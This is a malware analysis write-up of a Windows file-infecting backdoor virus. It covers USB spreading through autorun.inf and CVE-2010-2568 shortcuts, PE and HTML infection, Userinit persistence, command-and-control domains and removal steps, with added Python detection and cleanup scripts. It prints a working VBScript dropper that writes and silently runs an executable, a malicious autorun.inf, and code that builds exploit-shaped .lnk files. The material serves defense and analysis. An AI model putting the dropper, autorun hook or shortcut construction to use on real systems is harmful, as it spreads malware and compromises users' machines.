Platform: Win32
Type: Virus
Size: 103936 bytes
Language: C++
md5: CDF0778E1B80069D137A3E7A0C7C787F
sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43
Summary
A file-infecting virus with backdoor functionality. It appends itself to Windows executables and DLLs, adds a dropper script to HTM and HTML files, spreads over removable storage devices (autorun.inf plus shortcut files exploiting CVE-2010-2568), and receives commands from remote servers.
Technical Details
Spreading over Removable Storage Devices
On all removable storage devices connected to the infected computer, the virus creates the following files:
<infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)
<infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)
<infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)
<infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)
<infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)
<infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)
<infected volume name>:\autorun.inf (11964 bytes)
where
- <ID> is a numeric identifier formatted like a Windows security identifier (SID), so that the folder looks like one of the per-user subfolders of the recycle bin (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
- <rnd_1>, <rnd_2> are random sequences of Latin letters (e.g.: "xVgGwSIp", "lwTCZgQP").
The autorun.inf file contains the following:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-<ID>\<rnd_2>.exe
shell\explore\command=\RECYCLER\S-<ID>\<rnd_2>.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-<ID>\<rnd_2>.exe
The script is executed each time the user opens the infected volume in Windows Explorer, provided AutoPlay is enabled; the shell\open\command and shell\explore\command entries additionally redirect the ordinary "Open" and "Explore" context-menu actions to the same file. When executed, the script launches the "<rnd_2>.exe" file.
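As an added example (not part of the original description), the following Python script parses an autorun.inf the way an analyst triaging a suspicious USB volume would and reports every path the file would hand to Explorer for execution. The sample text is constructed from the listing above with the page's example <ID> and <rnd_2> values filled in and some filler lines added, since the real file (11964 bytes) is far larger than its meaningful content; the hook keys it recognises (open, shellexecute, shell\<verb>\command) are the ones Explorer acts on.

```python
import re

# Constructed sample: the autorun.inf listed above with the page's example
# <ID> and <rnd_2> substituted, plus filler lines standing in for padding.
SAMPLE_AUTORUN = (
    "[autorun]\n"
    "action=Open\n"
    "icon=%WinDir%\\system32\\shell32.dll,4\n"
    "shellexecute=\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\lwTCZgQP.exe\n"
    "shell\\explore\\command=\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\lwTCZgQP.exe\n"
    "USEAUTOPLAY=1\n"
    "shell\\Open\\command=\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\lwTCZgQP.exe\n"
    "\x00\x00;;; padding bytes ;;;\n"
    "random filler line without a separator\n"
)

EXEC_KEYS = {"open", "shellexecute"}                      # run something on AutoPlay
VERB_COMMAND_RE = re.compile(r"^shell\\[^\\=]+\\command$")  # shell\<verb>\command
HIDDEN_DIR_RE = re.compile(
    r"^\\?(recycler|recycled|\$recycle\.bin|system volume information)\\", re.I)
EXEC_EXT = (".exe", ".cpl", ".com", ".scr", ".bat", ".cmd", ".vbs", ".js")

def parse_autorun(text):
    """Return {key: [values]} for the [autorun] section.

    Key lookup is case-insensitive (as in Windows INI handling) and duplicate
    keys are kept, so a file that sets a hook twice stays visible.
    Lines that are not key=value pairs (padding, comments) are ignored.
    """
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip("\x00 \t\r")
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if not in_autorun or line.startswith(";") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        entries.setdefault(key.strip().lower(), []).append(value.strip())
    return entries

def launch_targets(text):
    """Every path this autorun.inf would hand to Explorer for execution."""
    targets = []
    for key, values in parse_autorun(text).items():
        if key in EXEC_KEYS or VERB_COMMAND_RE.match(key):
            targets.extend(values)
    return targets

def assess(text):
    """Pair each launch target with the reasons it looks malicious."""
    findings = []
    for target in launch_targets(text):
        reasons = []
        if HIDDEN_DIR_RE.match(target):
            reasons.append("target lives in a folder Explorer hides by default")
        if target.lower().endswith(EXEC_EXT):
            reasons.append("target is a directly executable file")
        findings.append((target, reasons))
    return findings

if __name__ == "__main__":
    for target, reasons in assess(SAMPLE_AUTORUN):
        print(target, "->", "; ".join(reasons) or "no finding")
```

The parser deliberately does not use configparser: the `%WinDir%` in the icon value would trip its interpolation, and it rejects the junk lines that padded autorun.inf files usually contain. Targets with command-line arguments are reported verbatim; the extension check looks only at the end of the whole value.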
The shortcuts created by the malicious program are exploits for the CVE-2010-2568
vulnerability. This is a flaw in the way the "shell32.dll" library processes
shortcut files (.lnk and .pif): when Windows Explorer renders the icon of a shortcut
that refers to a Control Panel item, it loads the library named in the shortcut and
runs its code. No click is required; merely displaying the folder that contains the
shortcuts is enough, so this vector works even when AutoPlay is disabled. Here the
library that gets loaded is "<rnd_1>.cpl"; once executed, it launches the "<rnd_2>.exe" file.
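As an added example, not taken from the original description or from the sample, the following Python code parses the LinkTargetIDList of a shell link (MS-SHLLINK) and flags the combination that characterises CVE-2010-2568 exploit shortcuts: an ItemID carrying the Control Panel folder CLSID followed by an ItemID naming a .cpl file. The two .lnk files it tests against are constructed here with a simplified ItemID layout (real exploit links carry extra fields in the Control Panel item), so the detector relies only on the CLSID bytes and on the embedded UTF-16 path, both of which real samples must contain. Do not list a folder of suspect shortcuts in Explorer on an unpatched system; copy them out under another extension or work from a patched machine.

```python
import re
import struct
import uuid

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046").bytes_le
HAS_LINK_TARGET_IDLIST = 0x00000001
# Shell folder CLSIDs as they appear (little-endian) inside ItemIDs.
MY_COMPUTER_CLSID = uuid.UUID("20D04FE0-3AEA-1069-A2D8-08002B30309D").bytes_le
CONTROL_PANEL_CLSID = uuid.UUID("21EC2020-3AEA-1069-A2DD-08002B30309D").bytes_le
# Runs of printable UTF-16LE characters inside an ItemID payload.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")

def parse_idlist(lnk):
    """Return the ItemID payloads of a .lnk file's LinkTargetIDList (MS-SHLLINK 2.2)."""
    if (len(lnk) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", lnk, 0)[0] != LNK_HEADER_SIZE
            or lnk[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", lnk, 0x14)[0]
    if not flags & HAS_LINK_TARGET_IDLIST:
        return []
    idlist_size = struct.unpack_from("<H", lnk, LNK_HEADER_SIZE)[0]
    off, end = LNK_HEADER_SIZE + 2, LNK_HEADER_SIZE + 2 + idlist_size
    if end > len(lnk):
        raise ValueError("truncated IDList")
    items = []
    while off + 2 <= end:
        size = struct.unpack_from("<H", lnk, off)[0]
        if size == 0:                       # TerminalID
            break
        if size < 2 or off + size > end:
            raise ValueError("malformed ItemID")
        items.append(lnk[off + 2:off + size])
        off += size
    return items

def triage_lnk(lnk):
    """Flag shortcuts whose target is a Control Panel item backed by a .cpl file."""
    items = parse_idlist(lnk)
    control_panel = any(CONTROL_PANEL_CLSID in item for item in items)
    cpl_paths = []
    for item in items:
        for m in UTF16_RUN.finditer(item):
            text = m.group().decode("utf-16-le")
            if text.lower().endswith(".cpl"):
                cpl_paths.append(text)
    return {"control_panel_target": control_panel, "cpl_paths": cpl_paths,
            "suspicious": control_panel and bool(cpl_paths)}

def item(type_byte, payload):
    """One ItemID: 2-byte size (including itself), type byte, payload."""
    body = bytes([type_byte]) + payload
    return struct.pack("<H", len(body) + 2) + body

def build_lnk(items):
    """Constructed minimal .lnk: header + LinkTargetIDList, nothing else."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID
              + struct.pack("<I", HAS_LINK_TARGET_IDLIST))
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    idlist = b"".join(items) + b"\x00\x00"   # TerminalID closes the list
    return header + struct.pack("<H", len(idlist)) + idlist

# Constructed exploit-style link: My Computer -> Control Panel -> a .cpl on the volume
# (path built from the page's example <ID> and <rnd_1> values).
CPL_PATH = "\\RECYCLER\\S-1-4-83-4678327503-5842818778-105234524-7024\\xVgGwSIp.cpl"
EXPLOIT_LNK = build_lnk([
    item(0x1F, b"\x50" + MY_COMPUTER_CLSID),
    item(0x2E, b"\x80" + CONTROL_PANEL_CLSID),
    item(0x00, CPL_PATH.encode("utf-16-le") + b"\x00\x00"),
])
# Constructed benign link: My Computer -> an ordinary file-system path.
BENIGN_LNK = build_lnk([
    item(0x1F, b"\x50" + MY_COMPUTER_CLSID),
    item(0x32, "C:\\Windows\\notepad.exe".encode("utf-16-le") + b"\x00\x00"),
])

if __name__ == "__main__":
    print("exploit-style:", triage_lnk(EXPLOIT_LNK))
    print("benign:", triage_lnk(BENIGN_LNK))
```

The parser stops after the IDList on purpose: LinkInfo, string data and extra data blocks are not needed for this verdict, and skipping them keeps the code from being misled by a crafted LinkInfo. On a real volume, run triage_lnk over every *.lnk and pair any hit with the .cpl it names to recover <rnd_1>.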
The malicious program prevents these files from being modified and re-creates them in an endless loop.
File Infection
The virus infects files with the following extensions:
exe
html
dll
htm
Executable files and Windows dynamic link libraries are infected by appending the
virus body to the end of the last PE section of the target file. The program's
entry point is then changed so that the virus code receives control before the
original code runs.
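An added example, not from the original description: a small PE header parser that tests a file for the shape the paragraph above describes, an entry point that falls in the last section rather than in the code section, typically in a section that had to be made executable (and is usually still writable) to host the appended body. The two images it checks are constructed in the block (headers only, zero-filled bodies); it is a heuristic, and packers such as UPX that also move the entry point will match it, so treat hits as candidates for a closer look, not as verdicts.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes

def parse_pe(pe):
    """Return (AddressOfEntryPoint, [(name, va, vsize, rawsize, rawptr, characteristics)])."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    n_sections = struct.unpack_from("<H", pe, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]
    entry = struct.unpack_from("<I", pe, pe_off + 24 + 16)[0]   # same offset in PE32 and PE32+
    table = pe_off + 24 + opt_size
    secs = []
    for i in range(n_sections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(
            pe, table + i * SECTION_HDR.size)
        secs.append((name.rstrip(b"\x00").decode("latin-1"), va, vsize, rawsize, rawptr, chars))
    return entry, secs

def entry_section_index(pe):
    """Index of the section whose virtual range holds the entry point, or None."""
    entry, secs = parse_pe(pe)
    for i, (_, va, vsize, rawsize, _, _) in enumerate(secs):
        if va <= entry < va + max(vsize, rawsize):
            return i
    return None

def infection_indicators(pe):
    """Reasons a file matches the 'body appended to last section, EP redirected' pattern."""
    entry, secs = parse_pe(pe)
    idx = entry_section_index(pe)
    if idx is None:
        return ["entry point 0x%x lies outside every section" % entry]
    name, va, vsize, rawsize, rawptr, chars = secs[idx]
    reasons = []
    if len(secs) > 1 and idx == len(secs) - 1:
        reasons.append("entry point is in the last section (%s)" % name)
    if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
        reasons.append("entry section %s is both writable and executable" % name)
    if not chars & IMAGE_SCN_CNT_CODE:
        reasons.append("entry section %s is not flagged as code" % name)
    return reasons

def build_pe(entry_rva, last_section_chars):
    """Constructed two-section PE32 image (headers only; section bodies are zero-filled)."""
    pe_off = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", pe_off)
    opt_size = 0xE0
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * 14 + struct.pack("<I", entry_rva)
    opt += b"\x00" * (opt_size - len(opt))
    def sec(name, va, size, rawptr, chars):
        return SECTION_HDR.pack(name, size, va, size, rawptr, 0, 0, 0, 0, chars)
    text = sec(b".text", 0x1000, 0x200, 0x200,
               IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    data = sec(b".data", 0x2000, 0x200, 0x400, last_section_chars)
    image = dos + coff + opt + text + data
    return image + b"\x00" * (0x600 - len(image))

CLEAN_PE = build_pe(0x1010, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
# Infected shape: entry point moved into the last section, which was made executable.
INFECTED_PE = build_pe(0x2100, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
                       | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE)

if __name__ == "__main__":
    print("clean:", infection_indicators(CLEAN_PE) or "no indicators")
    print("infected:", infection_indicators(INFECTED_PE))
```

Across a whole tree, files whose SizeOfRawData for the last section has grown relative to a known-good copy of the same binary are the ones to diff; the parser returns rawsize and rawptr for exactly that comparison.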
When infecting HTM and HTML files, the following script is appended to the end of the target document:
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A... (binary virus body)"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
Thus, each time the infected page is opened, the virus body (stored in the script as a hexadecimal string and written out byte by byte) is saved to the current user's temporary folder (GetSpecialFolder(2)) as
%Temp%\svchost.exe
and launched with a hidden window. The script depends on VBScript and on creating the Scripting.FileSystemObject and WScript.Shell ActiveX objects, so it only runs in Internet Explorer, and only in a security zone that permits those objects (for example a page opened from the local disk after the user allows the blocked content); other browsers ignore it.
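An added example, not part of the original description: a Python routine that finds the appended dropper in an infected HTML file, decodes the hex WriteData string back into the dropped executable (so it can be hashed and analysed without running the page), reports where the script would have dropped it, and strips the script from the page. The sample page is constructed here; its hex payload is a 16-byte stand-in beginning with the MZ signature, not the virus body.

```python
import hashlib
import re

# Constructed: a page carrying the appended dropper. The hex payload is a stand-in
# (a 16-byte fragment starting with the "MZ" signature), not the virus body.
INFECTED_HTML = """<html><body><p>Hello</p></body></html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
"""

SCRIPT_RE = re.compile(
    r"<script[^>]*language\s*=\s*['\"]?vbscript['\"]?[^>]*>(.*?)</script>", re.I | re.S)
STRING_VAR_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
# FileSystemObject.GetSpecialFolder constants: 0 Windows, 1 System, 2 Temporary.
SPECIAL_FOLDER = {0: "%WinDir%", 1: "%System%", 2: "%Temp%"}
DROP_FOLDER_RE = re.compile(r"GetSpecialFolder\((\d)\)")

def extract_droppers(html):
    """Find appended VBScript droppers; return one record per script with the decoded payload."""
    records = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if "CreateTextFile" not in body or "WriteData" not in body:
            continue
        strings = dict(STRING_VAR_RE.findall(body))
        try:
            payload = bytes.fromhex(strings.get("WriteData", ""))
        except ValueError:
            continue                    # not a plain hex string: needs a manual look
        folder = DROP_FOLDER_RE.search(body)
        records.append({
            "drop_name": strings.get("DropFileName"),
            "drop_folder": SPECIAL_FOLDER.get(int(folder.group(1)), "?") if folder else "?",
            "payload": payload,
            "is_pe": payload[:2] == b"MZ",
            "sha1": hashlib.sha1(payload).hexdigest(),
            "script_offset": m.start(),
        })
    return records

def disinfect(html):
    """Return the page with the dropper script(s) removed and everything else untouched."""
    return SCRIPT_RE.sub(lambda m: "" if "CreateTextFile" in m.group(1) else m.group(0), html)

if __name__ == "__main__":
    for rec in extract_droppers(INFECTED_HTML):
        print("%s\\%s  %d bytes  PE=%s  sha1=%s" % (
            rec["drop_folder"], rec["drop_name"], len(rec["payload"]), rec["is_pe"], rec["sha1"]))
```

The decoded payload is what the script would have written to %Temp%\svchost.exe, so its hash, not the hash of the HTML file, is the one to compare against a sandbox report for the dropped executable.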
Payload
Once an infected file is launched, the virus decrypts and extracts the following file from its body:
%WorkDir%\<name of the infected file being launched>Srv.exe
(%WorkDir% being the working directory of the infected program). The extracted file is then launched for execution. It in turn creates and launches a copy of itself as:
%Program Files%\Microsoft\WaterMark.exe
The "WaterMark.exe" process then starts a new instance of the "svchost.exe" system process and injects its code into it. The injected code performs the following actions:
- Creates a uniquely named global object (mutex) to ensure that only one instance of its process runs in the system:
Global\SYSTEM_DEMETRA_MAIN
- Modifies a registry value so that the copy created earlier is run automatically:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"
Because Userinit is started by the "winlogon.exe" process at every logon, the copy is launched even when the computer starts in Safe Mode.
- Prevents modification of this autorun registry value and of the "WaterMark.exe" file.
- Creates a configuration file to store the current settings of the malicious program:
%System%\dmlconf.dat
- Visits the following resource to check for an Internet connection:
google.com
- Implements a backdoor. To obtain a list of commands, it connects to the following servers:
tybdtyutjfyvetscev.com
ervwetyrbuyouiylkdhrbt.com
tybsyiutnrtvtybdrser.com
Depending on the command(s) received from the intruder, the backdoor can:
- download files to the infected computer and launch them for execution;
- connect to another server to get commands.
- The code injected into the address space of the "svchost.exe" process also carries out the functionality described in the "Spreading over Removable Storage Devices" and "File Infection" sections.
Removal Recommendations
To remove the malicious program, proceed through the steps listed below:
- Run a full scan of your computer using an antivirus program with an up-to-date definition database.
- Do not launch EXE, DLL, HTM or HTML files and do not reboot the computer until the full scan is complete.
- Do not browse infected removable volumes in Windows Explorer on a system without the fix for CVE-2010-2568 (displaying the folder is enough to trigger the shortcut exploit); clean them from a patched machine.
- Restore the infected files from backup copies.
- Restore the registry value:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit" = "userinit.exe"
- Delete the following files:
<infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)
<infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)
<infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)
<infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)
<infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)
<infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)
<infected volume name>:\autorun.inf (11964 bytes)
%Temp%\svchost.exe
%WorkDir%\<name of the infected file being launched>Srv.exe
%Program Files%\Microsoft\WaterMark.exe
- Delete the original virus file (its name and location depend on how the virus originally got onto the computer).
- Clear the Temporary Internet Files folder, which may contain infected files.
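As an added example for the registry step (not part of the original recommendations), the following Python code splits a Winlogon "Userinit" value the way winlogon does and reports every entry other than the stock userinit.exe, which is exactly what a persistence check on a cleaned machine should verify. The sample values are constructed from the description above; on Windows the script also reads the live value through winreg, and the stock value on Windows XP and 7 is "C:\Windows\system32\userinit.exe," (with a trailing comma), which the check accepts alongside the bare "userinit.exe" the page recommends.

```python
import sys

def userinit_entries(value):
    """Split a Winlogon "Userinit" value into the programs winlogon will start.

    The value is a comma-separated list; empty items (the ",," in the
    malicious value) are skipped and surrounding quotes/whitespace dropped.
    """
    return [e.strip().strip('"').strip() for e in value.split(",") if e.strip()]

# Spellings of the stock entry seen in practice (compared case-insensitively).
STOCK_USERINIT = {"userinit.exe", r"%system%\userinit.exe",
                  r"%systemroot%\system32\userinit.exe"}

def unexpected_userinit(value, system_dir=r"C:\Windows\system32"):
    """Entries other than the stock userinit.exe.

    Anything returned here runs at every logon, Safe Mode included, which is
    why this value is a favourite persistence point.
    """
    stock = STOCK_USERINIT | {(system_dir.rstrip("\\") + r"\userinit.exe").lower()}
    return [e for e in userinit_entries(value) if e.lower() not in stock]

# Constructed inputs: the value set by the virus (from the description above)
# and two forms of the stock value.
MALICIOUS_VALUE = r"%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"
STOCK_VALUE_XP_7 = r"C:\Windows\system32\userinit.exe,"
MINIMAL_VALUE = "userinit.exe"

if __name__ == "__main__":
    for label, value in (("malicious", MALICIOUS_VALUE), ("stock", STOCK_VALUE_XP_7)):
        print(label, "->", unexpected_userinit(value) or "clean")
    if sys.platform == "win32":
        import winreg
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                             r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon")
        live, _ = winreg.QueryValueEx(key, "Userinit")
        print("live Userinit =", live)
        print("unexpected entries:", unexpected_userinit(live) or "none")
```

If the value cannot be changed because the injected svchost.exe process is still guarding it, boot from clean media or an offline registry editor; rewriting it while the malware is running only triggers the protection described in the Payload section.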